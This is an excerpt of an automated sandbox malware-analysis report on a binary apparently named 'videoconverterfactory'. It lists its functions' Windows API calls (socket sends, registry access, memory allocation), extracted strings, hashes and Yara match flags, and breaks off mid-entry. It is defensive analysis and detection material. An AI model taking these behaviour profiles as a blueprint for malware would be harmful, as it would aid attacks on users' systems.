                                                                                                      • Opcode ID: 3815194b50b56a766773e46d83c536269388e24b89109f54980d104929c52956
                                                                                                      • Instruction ID: 3d5e7abc2a04279ff982222ddf6cb76c4cb106f2d765877c2a5e5a9eaca2334f
                                                                                                      • Opcode Fuzzy Hash: 3815194b50b56a766773e46d83c536269388e24b89109f54980d104929c52956
                                                                                                      • Instruction Fuzzy Hash: E1D02E39C842142BE2206AA0BD0EA3837ACD306312FD00640FD69C03C0EA827C2886A3
                                                                                                      APIs
                                                                                                      • __getptd_noexit.LIBCMT ref: 02D324A7
                                                                                                        • Part of subcall function 02D348E2: GetLastError.KERNEL32(76F90A60,76F8F550,02D34AD0,02D32043,76F8F550,?,02D25A0D,00000104,76F90A60,76F8F550,ntdll.dll,?,?,?,02D25EE9), ref: 02D348E4
                                                                                                        • Part of subcall function 02D348E2: __calloc_crt.LIBCMT ref: 02D34905
                                                                                                        • Part of subcall function 02D348E2: __initptd.LIBCMT ref: 02D34927
                                                                                                        • Part of subcall function 02D348E2: GetCurrentThreadId.KERNEL32 ref: 02D3492E
                                                                                                        • Part of subcall function 02D348E2: SetLastError.KERNEL32(00000000,02D25A0D,00000104,76F90A60,76F8F550,ntdll.dll,?,?,?,02D25EE9), ref: 02D34946
                                                                                                      • __freeptd.LIBCMT ref: 02D324C1
                                                                                                        • Part of subcall function 02D325A6: LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D324C0), ref: 02D325C0
                                                                                                        • Part of subcall function 02D325A6: GetProcAddress.KERNEL32(00000000), ref: 02D325C7
                                                                                                        • Part of subcall function 02D325A6: RtlEncodePointer.NTDLL(00000000), ref: 02D325D2
                                                                                                        • Part of subcall function 02D325A6: RtlDecodePointer.NTDLL(02D324C0), ref: 02D325ED
                                                                                                      • RtlExitUserThread.NTDLL(?,00000000,?,02D32483,00000000), ref: 02D324CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastPointerThread$AddressCurrentDecodeEncodeExitLibraryLoadProcUser__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 2811226776-0
                                                                                                      • Opcode ID: 15b79810e09a8f050c214260232533fa4ce1ce119c1f73961233a48568c73048
                                                                                                      • Instruction ID: de69ea31e78edd0debe1ebdb3ff36964fe5c214ad7070dd7018e6d75c05325c2
                                                                                                      • Opcode Fuzzy Hash: 15b79810e09a8f050c214260232533fa4ce1ce119c1f73961233a48568c73048
                                                                                                      • Instruction Fuzzy Hash: 3DD05E31C06A6467C6273A64C40C64A3759AF00768F040014D904053409B385E40C9B5
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040D462
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401ECB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      • API String ID: 71445658-2036018995
                                                                                                      • Opcode ID: 5ef05da2e287be01386b56ae824994a6b26e10f78201ff3431983e722134a090
                                                                                                      • Instruction ID: 994463204173b452b333b57129a026f6a75899614503d205bfe621b629104024
                                                                                                      • Opcode Fuzzy Hash: 5ef05da2e287be01386b56ae824994a6b26e10f78201ff3431983e722134a090
                                                                                                      • Instruction Fuzzy Hash: 7CD02B1053C252E5C61013304D0D6F6376497223907600133E802B31D2E33D4707D46F
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040D462
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401ECB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      • API String ID: 71445658-2036018995
                                                                                                      • Opcode ID: d54d18ebaca51a3a4b16b1e7f3d4270bf56b9e249673d27e042b07f750a77e47
                                                                                                      • Instruction ID: 6ab278ff3794771d0c05d303e076f6f752893f2bc1c2be07f58e288e60927e7e
                                                                                                      • Opcode Fuzzy Hash: d54d18ebaca51a3a4b16b1e7f3d4270bf56b9e249673d27e042b07f750a77e47
                                                                                                      • Instruction Fuzzy Hash: 2AC08C20B14102D9EA008AB04E4CB262264AB00744F20043B9807F21C0E3B89409ED1F
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D24BF2
                                                                                                        • Part of subcall function 02D21BA7: __EH_prolog.LIBCMT ref: 02D21BAC
                                                                                                        • Part of subcall function 02D21BA7: RtlEnterCriticalSection.NTDLL ref: 02D21BBC
                                                                                                        • Part of subcall function 02D21BA7: RtlLeaveCriticalSection.NTDLL ref: 02D21BEA
                                                                                                        • Part of subcall function 02D21BA7: RtlEnterCriticalSection.NTDLL ref: 02D21C13
                                                                                                        • Part of subcall function 02D21BA7: RtlLeaveCriticalSection.NTDLL ref: 02D21C56
                                                                                                        • Part of subcall function 02D2D0FD: __EH_prolog.LIBCMT ref: 02D2D102
                                                                                                        • Part of subcall function 02D2D0FD: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D2D181
                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02D24CF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1927618982-0
                                                                                                      • Opcode ID: 65ce369c9016c4ae00e931f912c73876348b63c797310982d0134707cf444aa0
                                                                                                      • Instruction ID: 45dd8c785535dd496b4efd9cc2e41e394fa289ce2ae5baf4399d16d0d92cf7d2
                                                                                                      • Opcode Fuzzy Hash: 65ce369c9016c4ae00e931f912c73876348b63c797310982d0134707cf444aa0
                                                                                                      • Instruction Fuzzy Hash: C851F875D04258DFDB15DFA8C484AEEBBB5EF28318F14815AE905AB351DB309E48CF60
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Software\EVCFactory57
                                                                                                      • API String ID: 0-1226175547
                                                                                                      • Opcode ID: faeae569f1bff3bc5f2d1e4badbb068eb81342c648fe046371049fb22da32726
                                                                                                      • Instruction ID: f4e621b970724f32723ec92b6617571dc1a6368be937146a85ed4f002fa4de5a
                                                                                                      • Opcode Fuzzy Hash: faeae569f1bff3bc5f2d1e4badbb068eb81342c648fe046371049fb22da32726
                                                                                                      • Instruction Fuzzy Hash: 8B11AF36A082429BC3118BB488265D5BF90FF4231075845BBC446B70E6C334844BCA8A
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22D47
                                                                                                      • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D22D5C
                                                                                                        • Part of subcall function 02D2950E: WSAGetLastError.WS2_32(00000000,?,?,02D22A51), ref: 02D2951C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Send
                                                                                                      • String ID:
                                                                                                      • API String ID: 1282938840-0
                                                                                                      • Opcode ID: 3c332b238fe63fae5c31877172d8a22ebff6c67cd41cceb8db1e1af8d823b0f2
                                                                                                      • Instruction ID: ebd73ad80199cc62e6ba75f7dc94f47b77f4d338704bd8701e99887e45dc73c8
                                                                                                      • Opcode Fuzzy Hash: 3c332b238fe63fae5c31877172d8a22ebff6c67cd41cceb8db1e1af8d823b0f2
                                                                                                      • Instruction Fuzzy Hash: 3D0184B5904215EFD7205FA4D85496BBBFDEF55768B20096EF89983300DB709D04CBA1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID: Wind
                                                                                                      • API String ID: 4275171209-2168060864
                                                                                                      • Opcode ID: cb64e78accfd5550945b64eb47a9cd4f4de17cc81304712c4b171e5fa87d105d
                                                                                                      • Instruction ID: abbba1d829fc36b5269af80708c5bab726d5499de4b849cbaf0ffa6c79d6ee15
                                                                                                      • Opcode Fuzzy Hash: cb64e78accfd5550945b64eb47a9cd4f4de17cc81304712c4b171e5fa87d105d
                                                                                                      • Instruction Fuzzy Hash: 5FF0F6A484D145DAC7058FE08A48569BA647A01300B3410B79843771E2C27C464BEBAF
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D2740C
                                                                                                      • shutdown.WS2_32(?,00000002), ref: 02D27415
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastshutdown
                                                                                                      • String ID:
                                                                                                      • API String ID: 1920494066-0
                                                                                                      • Opcode ID: 87208ad1fe5cdc3344e59d5e492503bfb2c72d59c812fd4ad1a67492a0d4179d
                                                                                                      • Instruction ID: 6eea55e33a631136b08a205d3c7ffde3c30df5325afe463da73c606397b946bb
                                                                                                      • Opcode Fuzzy Hash: 87208ad1fe5cdc3344e59d5e492503bfb2c72d59c812fd4ad1a67492a0d4179d
                                                                                                      • Instruction Fuzzy Hash: A8F0B435A043248FD7209F24E414B5ABBE5EF29729F108819ED9997380D730AC11CBA1
                                                                                                      APIs
                                                                                                      • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040D83A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcmpi
                                                                                                      • String ID: /chk
                                                                                                      • API String ID: 1586166983-3837807730
                                                                                                      • Opcode ID: ca802e415fbe136a6de2647275b032b5febeac02430efd5fb1e554358c0401a3
                                                                                                      • Instruction ID: 3c4a0673f303a77804557ff59b318f5cafc8c2d4361543ca073feffa71d9ba3c
                                                                                                      • Opcode Fuzzy Hash: ca802e415fbe136a6de2647275b032b5febeac02430efd5fb1e554358c0401a3
                                                                                                      • Instruction Fuzzy Hash: 2EF09035905625CAC7149F948E887E9B7B4AB45306F1080B6D849B6191C778C98ADF4A
                                                                                                      APIs
                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                                        • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                                      • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                                        • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 2507506473-0
                                                                                                      • Opcode ID: 0e50683ef5f87bfa7b7a3a131c3d96fe51d1ce1a964ea2283cbc2ce75e6f1d9c
                                                                                                      • Instruction ID: 550f2133393d729a37de5e2391f12db29a8156ca4bb40a4077295a364e13fd94
                                                                                                      • Opcode Fuzzy Hash: 0e50683ef5f87bfa7b7a3a131c3d96fe51d1ce1a964ea2283cbc2ce75e6f1d9c
                                                                                                      • Instruction Fuzzy Hash: A5F030706547019DDB101F319E4572A3AA89B4075BF10447FF900F91D1EFBC9684951D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3132538880-0
                                                                                                      • Opcode ID: b3f0a3012cda2ecbe676877ab2258b2c6f7eb0038d64c8daf59180ebaf6a9e9e
                                                                                                      • Instruction ID: dd6baf86791073165f8e6d056827b5d6c0182e1885c9b9beb2f6411162bbd969
                                                                                                      • Opcode Fuzzy Hash: b3f0a3012cda2ecbe676877ab2258b2c6f7eb0038d64c8daf59180ebaf6a9e9e
                                                                                                      • Instruction Fuzzy Hash: 61B00235404414DBCB551F50DF0D5587A71A748319F1204B5E3C670070CF350959BF1D
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D2511E
                                                                                                        • Part of subcall function 02D23D7E: htons.WS2_32(?), ref: 02D23DA2
                                                                                                        • Part of subcall function 02D23D7E: htonl.WS2_32(00000000), ref: 02D23DB9
                                                                                                        • Part of subcall function 02D23D7E: htonl.WS2_32(00000000), ref: 02D23DC0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: htonl$H_prologhtons
                                                                                                      • String ID:
                                                                                                      • API String ID: 4039807196-0
                                                                                                      • Opcode ID: 95aa2d40bb0d104140c7638a44e43e2e26ecf1c8c84b8c1aeaf26a446bc34a65
                                                                                                      • Instruction ID: a2634b51af2a73f2af819f8845a7c5125deaf58a62ae2cbfbabd50fc90388745
                                                                                                      • Opcode Fuzzy Hash: 95aa2d40bb0d104140c7638a44e43e2e26ecf1c8c84b8c1aeaf26a446bc34a65
                                                                                                      • Instruction Fuzzy Hash: 5A812871D0425A8ECF05DFA8D190AEEBBB5EF58218F20815AD854B7380EB755E09CF70
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: f1bdcbea4c7e0ea759f4af8fc48e8125573318089f4d085905d70bb81a84744e
                                                                                                      • Instruction ID: 4fe20496db32bccfbb5cd612f704bd0f196aa3ac625baf9191ad652888008616
                                                                                                      • Opcode Fuzzy Hash: f1bdcbea4c7e0ea759f4af8fc48e8125573318089f4d085905d70bb81a84744e
                                                                                                      • Instruction Fuzzy Hash: 8B415C7190021AEFCF14DF98C890EEEBBB9FF48318F10406AE945A7240D7749A49CF60
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D58000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D58000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d58000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 5c4e5655943009fb1092766a597991e22599825527628d79677a681d279093ed
                                                                                                      • Instruction ID: abd54977ba7fd54d836c720b9784f21db2805dff1873c10795682a50db4ef1a4
                                                                                                      • Opcode Fuzzy Hash: 5c4e5655943009fb1092766a597991e22599825527628d79677a681d279093ed
                                                                                                      • Instruction Fuzzy Hash: CD31547A44C205AFCB02AF28DC856A9FBF4EF45210F140A68DAC1C7651E7319861CAD3
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D2D9CB
                                                                                                        • Part of subcall function 02D21A01: TlsGetValue.KERNEL32 ref: 02D21A0A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prologValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3700342317-0
                                                                                                      • Opcode ID: b90cd0418acb4f672edda962a86ade812fe3c441601e9c8554a892b98b20fc9f
                                                                                                      • Instruction ID: 5a042e0fb3faab5ed885a61d3c99ee7d95138d37718d3f5cfaf1dea1c3b996d7
                                                                                                      • Opcode Fuzzy Hash: b90cd0418acb4f672edda962a86ade812fe3c441601e9c8554a892b98b20fc9f
                                                                                                      • Instruction Fuzzy Hash: FF213DB1908219AFDB00DFA9D440AEEBBF9FF59314F10811EE814A3340D771AD05CBA0
                                                                                                      APIs
                                                                                                      • SHGetSpecialFolderPathA.SHELL32 ref: 02D71009
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D58000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D58000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d58000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FolderPathSpecial
                                                                                                      • String ID:
                                                                                                      • API String ID: 994120019-0
                                                                                                      • Opcode ID: 13439ec6ce6bb3d9d2f1a2cf99bb2205c419bd6bced7ec92e2572c6f675d6c4d
                                                                                                      • Instruction ID: bdceb272cba3198614ea7ade236f19d21372c41facce62f34127b66ae30d07fc
                                                                                                      • Opcode Fuzzy Hash: 13439ec6ce6bb3d9d2f1a2cf99bb2205c419bd6bced7ec92e2572c6f675d6c4d
                                                                                                      • Instruction Fuzzy Hash: EC11C4B210C600DFF302AF18EC856BEFBE5EB94320F11892DE6C582B14E675D845CA93
                                                                                                      APIs
                                                                                                        • Part of subcall function 02D2C3C9: __EH_prolog.LIBCMT ref: 02D2C3CE
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02D2CCB3
                                                                                                        • Part of subcall function 02D331CA: RaiseException.KERNEL32(?,?,02D2EB64,?,?,?,?,?,?,?,02D2EB64,?,02D4ECA8,?), ref: 02D3321F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1681477883-0
                                                                                                      • Opcode ID: 53e1787581c66383c936475dc3dd7bb7aba4efa2bcb411e416d9f72fab99c19d
                                                                                                      • Instruction ID: 578a38abd047eb273c4a35445114f9ba4a58951b92da3910a8a313b5c623687f
                                                                                                      • Opcode Fuzzy Hash: 53e1787581c66383c936475dc3dd7bb7aba4efa2bcb411e416d9f72fab99c19d
                                                                                                      • Instruction Fuzzy Hash: FCF0AF719102186FD618ABADD845D9BB3ECDB08314B00055DF60693600EAA1F9148AF1
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D2D55B
                                                                                                        • Part of subcall function 02D226DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D22706
                                                                                                        • Part of subcall function 02D226DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D2272B
                                                                                                        • Part of subcall function 02D226DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D43173), ref: 02D22738
                                                                                                        • Part of subcall function 02D226DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D22778
                                                                                                        • Part of subcall function 02D226DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D227D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 4293676635-0
                                                                                                      • Opcode ID: 32c2a8de55b7464fd62681eeabf0b158163465dd67ec6a89b7f1f5dd273b6ec2
                                                                                                      • Instruction ID: c8617c1c433dccc253ac1914d7efe1f09f49b7e56a3875f3ec9b1a7d0a47736a
                                                                                                      • Opcode Fuzzy Hash: 32c2a8de55b7464fd62681eeabf0b158163465dd67ec6a89b7f1f5dd273b6ec2
                                                                                                      • Instruction Fuzzy Hash: FE0190B1900B589FC328CF1AC544956FBF5EF98314B15C5AF98498B722EB71DA40CF94
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D58000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D58000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d58000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 7768b30b0d9d48227034867cb732f51adca8886823c5e30fae0139034fc61c82
                                                                                                      • Instruction ID: b1464492708184422704e7066cdc7a76d49fa6a93dff2c8c2c668832a64b4628
                                                                                                      • Opcode Fuzzy Hash: 7768b30b0d9d48227034867cb732f51adca8886823c5e30fae0139034fc61c82
                                                                                                      • Instruction Fuzzy Hash: 73F030B6448208EFD7117F44EC05A6ABBE8EB18610F040914ABD082301E776AD648AA7
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D2D33A
                                                                                                        • Part of subcall function 02D327C5: _malloc.LIBCMT ref: 02D327DD
                                                                                                        • Part of subcall function 02D2D556: __EH_prolog.LIBCMT ref: 02D2D55B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4254904621-0
                                                                                                      • Opcode ID: 8d7f7617cb34f4684da044b235b16dfb243c38cbea87e3ac86a92e7152aea4c0
                                                                                                      • Instruction ID: a37fac259475f9448b9d3d5780542f3a0f01f1aa786109673580e5731400c671
                                                                                                      • Opcode Fuzzy Hash: 8d7f7617cb34f4684da044b235b16dfb243c38cbea87e3ac86a92e7152aea4c0
                                                                                                      • Instruction Fuzzy Hash: 62E08C71A04115ABEB19EF68D80172D77A6EB48704F0045AEBC09E2340EF719D00CA24
                                                                                                      APIs
                                                                                                        • Part of subcall function 02D348CA: __getptd_noexit.LIBCMT ref: 02D348CB
                                                                                                        • Part of subcall function 02D348CA: __amsg_exit.LIBCMT ref: 02D348D8
                                                                                                        • Part of subcall function 02D324A3: __getptd_noexit.LIBCMT ref: 02D324A7
                                                                                                        • Part of subcall function 02D324A3: __freeptd.LIBCMT ref: 02D324C1
                                                                                                        • Part of subcall function 02D324A3: RtlExitUserThread.NTDLL(?,00000000,?,02D32483,00000000), ref: 02D324CA
                                                                                                      • __XcptFilter.LIBCMT ref: 02D3248F
                                                                                                        • Part of subcall function 02D37954: __getptd_noexit.LIBCMT ref: 02D37958
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 1405322794-0
                                                                                                      • Opcode ID: 4626d39e5153587c79aae0b29c941a06e5089a484340d2e97d6716485a6d8fb0
                                                                                                      • Instruction ID: b3f11a68fa5ac217dd55cce21901b0c12c950bd3364025f8177223a5916dfacb
                                                                                                      • Opcode Fuzzy Hash: 4626d39e5153587c79aae0b29c941a06e5089a484340d2e97d6716485a6d8fb0
                                                                                                      • Instruction Fuzzy Hash: A7E0ECF1D006049FFB09ABA0D949F6DB766EF44321F200189E5019B370DA749D44DE30
                                                                                                      APIs
                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002), ref: 00402220
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: 312c36b3a06433b50237f29373087343ad90e2aead52a154aece252fa8fe9cef
                                                                                                      • Instruction ID: 0c6cf0a13e544d1250551069b4c9a98cb55b75ea00e83d7dbfe988fdcd72ff88
                                                                                                      • Opcode Fuzzy Hash: 312c36b3a06433b50237f29373087343ad90e2aead52a154aece252fa8fe9cef
                                                                                                      • Instruction Fuzzy Hash: 9DD05E6860C1C08EC6111BB02F143B27F608216300B5820BBC0C2F2093C03C854BBB2F
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
